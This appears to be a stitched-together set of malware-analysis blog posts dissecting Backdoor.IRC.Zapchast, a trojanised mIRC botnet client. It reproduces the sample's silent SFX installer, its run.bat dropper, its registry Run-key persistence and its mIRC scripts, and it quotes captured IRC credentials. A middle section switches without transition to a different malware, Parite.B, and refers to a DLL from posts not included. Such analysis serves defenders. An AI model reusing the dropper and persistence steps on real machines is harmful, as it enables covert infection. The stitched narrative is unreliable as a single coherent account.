Backdoor.IRC.Zapchast - mIRC used as Zombie - Reversing Malicious Network-IRC Activity

In this blog post we are going to investigate the malicious network activity of a still-active backdoor/zombie called Backdoor.IRC.Zapchast. Here is a short summary of its functionality:

* Changes the security settings of Internet Explorer
* Survives a system restart
* Creates various copies of itself in the Windows directory
* Spawns other processes
* Joins an IRC network (the most interesting functionality)

This last functionality is the most interesting one, and indeed this post focuses on the network activity of Backdoor.IRC.Zapchast. When a malware sample has the ability to connect to an IRC server we are dealing with a zombie, a malicious entity that is part of a botnet. By analyzing this kind of malware we can obtain truly interesting information on the botnet involved, because at a certain point of the infection, during the subsequent packet exchange, the IRC server credentials needed to identify and trust the zombie are sent over the wire. Here is a short list of the information we can obtain:

* Involved malicious domains
* IRC servers used, with their credentials
* Botnet structure
* Via infiltration, further information on the network structure
* Malicious files downloaded, with their origin
* Stolen data

When we have an application like IRC.Zapchast we can follow two ways, or a mix of both:

* Network packet dissection (fast, great for evidence collection, some information lost)
* Pure binary reverse engineering (the classical way, complete knowledge but slow)
* Mixed approach

We will follow the mixed approach: first, via direct reverse engineering of the code, we study the general anatomy of the backdoor, understanding how the infection happens, how it evolves and above all which components it affects; then we proceed with packet analysis to carve out all the useful information.

Now let's take a look at the malicious binary.

FileName: hellmark.exe
FileInfo: RAR SFX
MD5: 9AA2DFAD668A9B6FACF78AF925DB0B23

The application is compressed as a RAR SFX; these executables are self-extracting .rar archives. Usually such an executable contains a collection of files plus an SFX script that drives the extraction. Like every packed executable we can unpack it and extract each contained file separately. In our case the malicious binary is only RAR-SFXed and apparently has no other encryption layers, which means we can explore the executable directly with a RAR management tool that supports .exe unpacking, such as AnyRAR.

We can immediately see that hellmark.exe embeds the following files:

1. a.reg
2. aliases.ini
3. com.mrc
4. control.ini
5. fullname.txt
6. ident.txt
7. mirc.ico
8. remote.ini
9. run.bat
10. s.mrc
11. servers.ini
12. spoolsv.exe
13. users.ini
14. xmas.jpg

As you can see, these files seem to be strictly related to malicious IRC activity (ident.txt, s.mrc, com.mrc, etc.). The executable also contains an SFX script, which AnyRAR decodes automatically; let's see what this script does:

Path=C:\Windows\temp\spoolsv\
SavePath
Setup=C:\Windows\temp\spoolsv\run.bat
Silent=1
Overwrite=2

The malicious code is installed into Windows\temp\spoolsv\ by a .bat script called run.bat, and the whole process runs silently, without notifying the user. Now let's extract all these files and inspect their content.
The first file we are going to inspect is run.bat; here is its content:

@ECHO OFF
START regedit /s %SystemRoot%\Temp\spoolsv\a.reg
START %SystemRoot%\temp\spoolsv\spoolsv.exe
START %SystemRoot%\temp\spoolsv\xmas.jpg
START attrib +H +S %SystemRoot%\temp\spoolsv

Without prompting the user, it runs regedit silently on a.reg, a file that modifies the Windows registry, then launches spoolsv.exe, opens xmas.jpg and finally sets the hidden and system attributes on the spoolsv directory so that it disappears from normal directory listings. This is the backdoor installer; now let's see the registry changes made by a.reg:

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\svchost\Parameters]
"Application"="\"C:\\Windows\\temp\\spoolsv\\spoolsv.exe\""
"AppDirectory"="\"C:\\Windows\\temp\\spoolsv\\spoolsv.exe\""
[HKEY_CURRENT_USER\Software\mIRC]
[HKEY_CURRENT_USER\Software\mIRC\Channels]
[HKEY_CURRENT_USER\Software\mIRC\License]
@="--------"
[HKEY_CURRENT_USER\Software\mIRC\LockOptions]
@="0,4096"
[HKEY_CURRENT_USER\Software\mIRC\UserName]
@="------"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"spoolsv"="\"C:\\Windows\\temp\\spoolsv\\spoolsv.exe\""

These registry keys add the malicious spoolsv.exe as the application of the svchost service entry and register the mIRC copy (license key + username); then spoolsv.exe is registered among the Run applications, an operation that ensures the malicious client is executed at every system start.
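As an added example (not part of the original post), here is a small Python parser for .reg dumps like a.reg; it flags autostart entries (Run keys, service parameters) whose target lives under a temp directory, which is exactly the persistence pattern above. The sample text is constructed from the keys quoted in the post.

```python
import re

# Constructed sample mirroring the a.reg entries quoted in the post
SAMPLE_REG = r'''[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\svchost\Parameters]
"Application"="\"C:\\Windows\\temp\\spoolsv\\spoolsv.exe\""
"AppDirectory"="\"C:\\Windows\\temp\\spoolsv\\spoolsv.exe\""
[HKEY_CURRENT_USER\Software\mIRC\UserName]
@="------"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"spoolsv"="\"C:\\Windows\\temp\\spoolsv\\spoolsv.exe\""
'''

# Key fragments that grant automatic execution (Run entries, service parameters)
PERSISTENCE_KEYS = ("\\currentversion\\run", "\\currentcontrolset\\services\\")


def parse_reg(text):
    """Return (key, value_name, value) tuples for every value in a .reg dump."""
    key, entries = None, []
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
        elif key and "=" in line:
            name, _, val = line.partition("=")
            name = "(Default)" if name == "@" else name.strip('"')
            val = val.strip()
            if val.startswith('"') and val.endswith('"'):
                # .reg quoted strings escape backslash and double quote with a backslash
                val = re.sub(r"\\(.)", r"\1", val[1:-1])
            entries.append((key, name, val))
    return entries


def suspicious_persistence(entries):
    """Autostart values whose command points into a temp directory."""
    hits = []
    for key, name, val in entries:
        in_autostart = any(frag in key.lower() for frag in PERSISTENCE_KEYS)
        if in_autostart and "\\temp\\" in val.lower():
            hits.append((key, name, val))
    return hits


if __name__ == "__main__":
    for key, name, val in suspicious_persistence(parse_reg(SAMPLE_REG)):
        print(f"{key}\n  {name} = {val}")
```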

Now it's time to quickly inspect this malicious client, called spoolsv.exe; in the usual way we first examine the PE structure and then disassemble it.

Among the file information we can see:

CompanyName: mIRC Co. Ltd.
FileVersion: 6.03
InternalName: mIRC
LegalCopyright: Copyright © 1995-2002 mIRC Co. Ltd.
LegalTrademarks: mIRC® is a Registered Trademark of mIRC Co. Ltd.
OriginalFilename: mirc.exe
ProductName: mIRC

SHA-1: 33CDFE6F7FA6B321F9A51CC051C32BA924164B10

We land on a truly interesting discovery here: a harmless copy of the well-known IRC client mIRC is used as botnet zombie and backdoor. This matters because a direct detection approach on the binary would cause FP (false positive) problems. What differentiates the malicious mIRC edition from the legitimate one is the presence of the various mIRC scripts.

In the .txt and .ini files we can see the IRC ident credentials and the list of servers used.

fullname.txt contains a collection of statements like these:
weed? hmmm? ok!
Stoned!
boom biddy bye bye
i love drugs
jamaica
skunk + blunt = special joint :-)

ident.txt:
dream
dreaming
roz
dreamer
cry
die
love
sweet
kiss
ana
anca
dana
corina
Monica

In users.ini we can see 10 users:
n1=100:*!*@b---.com
n2=100:*!*@f-----rnet.org
n3=100:*!*@fina----dernet.org
n4=100:*!*@C---rs.undernet.org
n5=100:*!*@Ihate---dernet.org
n6=100:*!*@Bo----ush.biz
n7=100:*!*@ite---ernet.org
n8=100:*!*@m-net.org
n9=100:*!*@ra----net.org
n10=100:*!*@jus-------net.org

In servers.ini there are 33 servers listed; here are the first entries:

n1=CoolSERVER:i------iz:6667GROUP:Cool
n2=CoolSERVER:help----h.com:6667GROUP:Cool
n3=LelystadSERVER:Lely------Net.Org:6667GROUP:Undernet
n4=HelsinkiSERVER:Hels-ernet.Org:6667GROUP:Undernet
n5=Mesa2SERVER:M-rnet.Org:6667GROUP:Undernet
n6=BudapestSERVER:Buda-rNet.Org:6667GROUP:Undernet
n7=TampaSERVER:Tam-rnet.Org:6667GROUP:Undernet
n8=ZagrebSERVER:Za-derNet.Org:6667GROUP:Undernet

Finally, it's interesting to inspect the mirc.ini settings:

[dde]
ServerStatus=off
ServiceName=svchost
CheckName=off
..
accept=*.jpg,*.gif,*.png,*.bmp,*.txt,*.log,*.wav,*.mid,*.mp3,*.wma,*.ogg,*.zip
ignore=*.exe,*.com,*.bat,*.dll,*.ini,*.mrc,*.vbs,*.js,*.pif,*.scr,*.lnk,*.pl,*.shs,*.htm,*.html
user=X
nick=X
anick=X
email=X
host=D-rnet.ORG:6669GROUP:Undernet
[files]
servers=servers.ini
finger=finger.txt
urls=urls.ini
addrbk=addrbk.ini
trayicon=mirc.ico
[afiles]
n0=aliases.ini
[rfiles]
n0=users.ini
n1=remote.ini
n2=com.mrc
n3=s.mrc

An interesting option is the hide=1 style, which makes mIRC run stealthily. Now the analysis proceeds with the mIRC scripts involved:

* com.mrc
* s.mrc

s.mrc manages silencing (flood protection):

on *:open:?:{
  inc -u3 %msg.floodpro 1
  if (%msg.floodpro == 2) {
    ame 2Message 4Flood 2 Detected, 2 Activating 4 Silence 2 for 12 1 2 minute
    silence +*!*@*
    timerunsilence 1 60 silence -*!*@*
    close -m
  }
}

on *:notice:*:?:{
  if (%notice.floodpro.nick != $nick) {
    inc -u3 %notice.floodpro 1
  }
  if (%notice.floodpro == 2) {
    ame 2Notice 4 Flood 2 Detected, 2 Activating 4 Silence 2 for 12 1 2 minute
    silence +*!*@*
    timerunsilence 1 60 silence -*!*@*
  }
  set %notice.floodpro.nick $nick
}

ctcp *:*:?:{
  if (%ctcp.floodpro.nick != $nick) {
    inc -u3 %ctcp.floodpro 1
  }
  if (%ctcp.floodpro == 2) {
    ame 2CTCP 4 Flood 2 Detected, 2 Activating 4 Silence 2 for 12 1 2 minute
    silence +*!*@*
    timerunsilence 1 60 silence -*!*@*
  }
  set %ctcp.floodpro.nick $nick
}

on *:invite:#:{
  if (%invite.floodpro.nick != $nick) {
    inc -u3 %invite.floodpro 1
  }
  if (%invite.floodpro == 2) {
    ame 2Invite 4 Flood 2 Detected, 2 Activating 4 Silence 2 for 12 1 2 minute
    silence +*!*@*
    timerunsilence 1 60 silence -*!*@*
  }
  set %invite.floodpro.nick $nick
}

on *:notice:*:#:{
  hinc -mu2 spam $chan
  if $hget(spam,$chan) >= 3 {
    mode $me +d
    timerunsilence 1 60 mode $me -d
    ame 2Modul 4 +d 2 este activat din cauza 4 floodului 2 pt 4 1 min 4 sa va trag la muie
  }
}

com.mrc is a bit longer than s.mrc and, as the name suggests, it manages communication with the botnet; in other words it takes the information from all the previously seen .txt and .ini files to build an ident profile for each IRC server contained in the list.

In the next episode we will analyze com.mrc in depth and perform a direct analysis of how this malicious version of mIRC is used, to see what effectively happens inside these malicious servers/channels; we will also follow the packet analysis way and analyze the network activity via Wireshark.

This is matter for another episode.. =)

This time we will move our point of view to the instant immediately after infection, the point where Parite.B attempts to establish network communication with an IRC server and two websites.

The best approach to discover and define the network features is to use a packet capture system like Wireshark inside a well-controlled environment; VMware or VirtualBox is perfect. Just remember, if you are not sure of the capabilities of your malware, to properly isolate the transactions between host and guest systems.

When the environment is ready, run Wireshark and watch the traffic dumped while the system is at rest: whatever is captured at this point is just noise inside the malware activity PCAP, so be smart enough to build the appropriate packet filtering rules.

Now you can run Parite.B; just wait a moment and Wireshark will do its work. Just a note: if you dissect the network activity of this Parite variant today, a lot of information is lost, because the malicious server has changed.

Here is some evidence of Parite's network activity:

http://2.bp.blogspot.com/_8XESv__n8f4/S5NmQVxPX_I/AAAAAAAAACk/8nYDBgUklPM/s640/DNS.jpg

As you can see, here we have two DNS queries (type A) for two domains, which are correctly resolved. Next we can see some HTTP requests performed against the first domain:

http://4.bp.blogspot.com/_8XESv__n8f4/S5NnvQo1bZI/AAAAAAAAACs/JV_T4RFja6k/s640/Http_Rq.jpg

Our malicious binary requests a malicious file called imag1.gif and then mais1.php.

This confirms the download functionality of Parite; now we are also able to build a blocking rule for this malicious domain. By inspecting further activity we can carve out the following truly interesting information:

Parite.B attempts to connect to:

195.202.- 80
221.143.- 80
66.40.- 21

Plus, by watching the traffic produced to reach an IRC server, we can isolate the following credential:
USER clamar42

From the port 21 traffic we can carve out the following password:

PASS 9136499

Another important thing not to forget is to check the hosts file: usually this kind of malware adds URL-to-IP mappings. Obviously you need a copy of the hosts file from BEFORE and AFTER infection; with a basic diff between these two snapshots we immediately detect two domains that were certainly inserted by Parite:

127.0.0.1 www.-----.com.br
127.0.0.1 www.------.com.br

These domains come from Brazil and belong to Brazilian banking services.
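Here is an added Python example (not from the post) of the before/after hosts-file comparison described above: it parses both snapshots, reports the entries the infection added or changed, and separates names sinkholed to loopback from names redirected to a remote IP. The snapshots are constructed, with the two banking domains masked as in the post.

```python
import ipaddress

# Constructed snapshots; the two redirected domains are masked as in the post
HOSTS_BEFORE = """# constructed clean hosts file
127.0.0.1       localhost
"""
HOSTS_AFTER = """# constructed clean hosts file
127.0.0.1       localhost
127.0.0.1 www.-----.com.br
127.0.0.1 www.------.com.br
"""


def parse_hosts(text):
    """hostname -> IP for every active (non-comment) hosts-file entry."""
    mapping = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments and blank lines
        if not line:
            continue
        ip, *names = line.split()             # one IP, one or more names per line
        for name in names:
            mapping[name.lower()] = ip
    return mapping


def hosts_delta(before, after):
    """Entries added or changed between two snapshots: (hostname, old_ip, new_ip)."""
    old, new = parse_hosts(before), parse_hosts(after)
    return [(host, old.get(host), ip) for host, ip in new.items() if old.get(host) != ip]


def classify(delta):
    """Split the delta into names sinkholed to loopback and names redirected elsewhere."""
    sinkholed, redirected = [], []
    for host, _old_ip, new_ip in delta:
        try:
            is_loopback = ipaddress.ip_address(new_ip).is_loopback
        except ValueError:                    # malformed address: still report it
            is_loopback = False
        (sinkholed if is_loopback else redirected).append((host, new_ip))
    return sinkholed, redirected


if __name__ == "__main__":
    sink, redir = classify(hosts_delta(HOSTS_BEFORE, HOSTS_AFTER))
    print("sinkholed:", sink)
    print("redirected:", redir)
```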

In the next post we will see how the malicious DLL encountered in the previous posts works.

Finally we land on the third and last episode of the Backdoor.IRC.Zapchast analysis.
As you have previously seen, mIRC connects to some malicious IRC server; the victim that executes hellmark.exe will join certain channels and idle until an admin user decides how to use this zombified victim. Usually the most common activity is downloading other malicious applications onto the victim.

In this post we are going to inspect in depth the network activity of an infected machine; we will use Wireshark on a precise schedule. For each user event we will build a different log, in this way:

* During infection
* Infected victim
* At every daily restart of the infected machine

The most interesting results are given by prolonged observation planned on a daily basis. The first two events do not need to be reported here because we have already seen directly how they happen; we will focus directly on an active usage of the backdoor that happened some days ago. But before starting, here is a screenshot of what 'usual activity' looks like.

First One:

http://2.bp.blogspot.com/_8XESv__n8f4/S5u-E5ml6sI/AAAAAAAAADM/MnkO-crogDc/s640/irc_activity1.jpg

Second One:

http://3.bp.blogspot.com/_8XESv__n8f4/S5vGZ7nWLrI/AAAAAAAAADc/OMmr1ydk2Yo/s640/irc_act2.jpg

We can distinguish a PING - PONG exchange, usual for every IRC connection.

Finally, here we have a typical channel activity:

http://1.bp.blogspot.com/_8XESv__n8f4/S5vL8KI7OyI/AAAAAAAAADs/L_liFdoeIrA/s640/chan_act.jpg

As you can see, an administrator sends commands to an infected victim (the zombie); in this case it adds some auser addresses (mIRC user-list entries).

Here the paper ends. I'll continue with daily investigations on this network and if something interesting comes up, I'll publish it here..

Regards,
Giuseppe 'Evilcry' Bonfa